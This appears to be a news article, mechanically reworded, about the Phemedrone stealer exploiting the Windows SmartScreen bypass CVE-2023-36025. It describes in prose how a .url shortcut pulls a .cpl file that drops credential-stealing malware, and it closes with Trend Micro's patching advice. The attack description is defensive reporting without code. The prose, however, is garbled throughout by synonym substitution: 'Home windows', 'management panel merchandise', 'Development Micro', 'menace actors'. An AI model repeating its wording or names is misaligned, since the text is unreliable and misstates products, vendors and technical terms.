The execution of the .url file establishes a connection to an attacker-controlled server to obtain and execute a management panel merchandise (.cpl) file. Ideally, Microsoft Defender SmartScreen ought to shoot up warnings and safety prompts earlier than executing the .url file from an untrusted supply.
“The attackers craft a Home windows shortcut (.url) file to evade the SmartScreen safety immediate by using a .cpl file as a part of a malicious payload supply mechanism,” in line with the publish. “Menace actors leverage MITRE ATT&CK method T1218.002, which abuses the Home windows Management Panel course of binary (management.exe) to execute .cpl information.”
The malicious .cpl file is then executed by means of the Home windows Management Panel course of binary to launch the ultimate Phemedrone dropper together with a number of different steps to ascertain persistence. As soon as launched, Phemedrone initializes configurations and decrypts important gadgets and credentials from focused functions on contaminated techniques, together with Chromium browsers, crypto wallets, Discord, FileGrabber, FileZilla, System Data, Steam, and Telegram.
Exploitation regardless of patch
Microsoft had fastened CVE-2023-36025 as a part of November 2023 patch Tuesday and had really useful customers to replace instantly because the bug had excessive lively exploitations.
“Regardless of having been patched, menace actors proceed to seek out methods to take advantage of CVE-2023-36025 and evade Home windows Defender SmartScreen protections to contaminate customers with a plethora of malware varieties,” Development Micro mentioned. “Public proof-of-concept exploit code exists on the net rising the danger to organizations who haven’t but up to date to the newest patched model.”
Development Micro recommends instantly updating to patched variations of Home windows installations, and deploying efficient XDR instruments to detect, scan, and block malicious content material persistently.
